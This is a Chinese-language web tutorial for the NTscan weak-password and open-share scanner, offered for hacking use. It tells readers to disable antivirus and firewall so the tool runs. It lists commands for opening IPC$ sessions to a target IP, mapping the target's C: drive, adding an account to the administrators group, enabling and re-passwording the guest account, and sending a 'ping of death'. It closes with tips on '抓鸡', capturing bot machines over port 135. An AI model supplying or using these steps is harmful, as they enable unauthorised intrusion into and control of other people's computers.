ntscan

本文详细介绍了ntscan变态扫描器的用法以及经常遇到的一些问题

ntscan下载地址

ntscan是一个扫描器，可以扫描没有密码保护的管理员共享，先到配置文件中填写猜测的用户名和密码，扫描过程中右侧出现的是扫描日志。

NTscan变态扫描器为什么报毒？

一般杀毒软件会把NTscan报告成黑客程序，导致NTscan无法运行。如果想正常运行NTscan，必须把杀毒软件关掉，同时把安装的防火墙也关掉。

NTscan变态扫描器命令详解

net use//ip/ipc$""/user:""建立IPC空链接

   net use//ip/ipc$"密码"/user:"用户名"建立IPC非空链接

   net use h://ip/c$"密码"/user:"用户名"直接登陆后映射对方C：到本地为H:

   net use h://ip/c$登陆后映射对方C：到本地为H:

   net use//ip/ipc$/del删除IPC链接

   net use h:/del删除映射对方到本地的为H:的映射

   net user用户名密码/add建立用户

   net user guest/active:yes激活guest用户

   net user查看有哪些用户

   net user帐户名查看帐户的属性

   net localgroup administrators用户名/add把"用户"添加到管理员中使其具有管理员权限,注意：administrator后加s用复数

   net start查看开启了哪些服务

   net start服务名开启服务；(如:net start telnet， net start schedule)

   net stop服务名停止某服务

   net time//目标ip查看对方时间

   net time//目标ip/set设置本地计算机时间与"目标IP"主机的时间同步,加上参数/yes可取消确认信息

   net view查看本地局域网内开启了哪些共享

   net view//ip查看对方局域网内开启了哪些共享

   net config显示系统网络设置

   net logoff断开连接的共享

   net pause服务名暂停某服务

   net send ip"文本信息"向对方发信息

   net ver局域网内正在使用的网络连接类型和信息

   net share查看本地开启的共享

   net share ipc$开启ipc$共享

   net share ipc$/del删除ipc$共享

   net share c$/del删除C：共享

   net user guest 12345用guest用户登陆后用将密码改为12345

   net password密码更改系统登陆密码

   netstat-a查看开启了哪些端口,常用netstat-an

   netstat-n查看端口的网络连接情况，常用netstat-an

   netstat-v查看正在进行的工作

   netstat-p协议名例：netstat-p tcq/ip查看某协议使用情况（查看tcp/ip协议使用情况）

   netstat-s查看正在使用的所有协议使用情况

   nbtstat-A ip对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写

   tracert-参数 ip(或计算机名)跟踪路由（数据包），参数："-w数字"用于设置超时间隔。

   ping ip(或域名)向对方主机发送默认大小为32字节的数据，参数："-l[空格]数据包大小"；"-n发送数据次数"；"-t"指一直ping。

   ping-t-l 65550 ip死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

   ipconfig(winipcfg)用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数"/all"显示全部配置信息

   tlist-t以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

   kill-F进程名加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

   del-F文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如"DEL/AR*.*"表示删除当前目录下所有只读文件，"DEL/A-S*.*"表示删除当前目录下除系统文件以外的所有文件

NTscan为什么扫不出弱口令？

如果是内网的用户，只能扫内网的ip，其次你的机子要突破线程限制，改到一千左右，NTSCAN,X-SCAN和流光扫描器这些现在只能扫本地ip了。所以假如你是用135端口抓鸡的话，现在只能抓本地的，本地ip可以打开“运行”输入ipconfig可以看到，想扫外网的话，用路由器映射端口。

OK，本文到此结束，希望对大家有所帮助。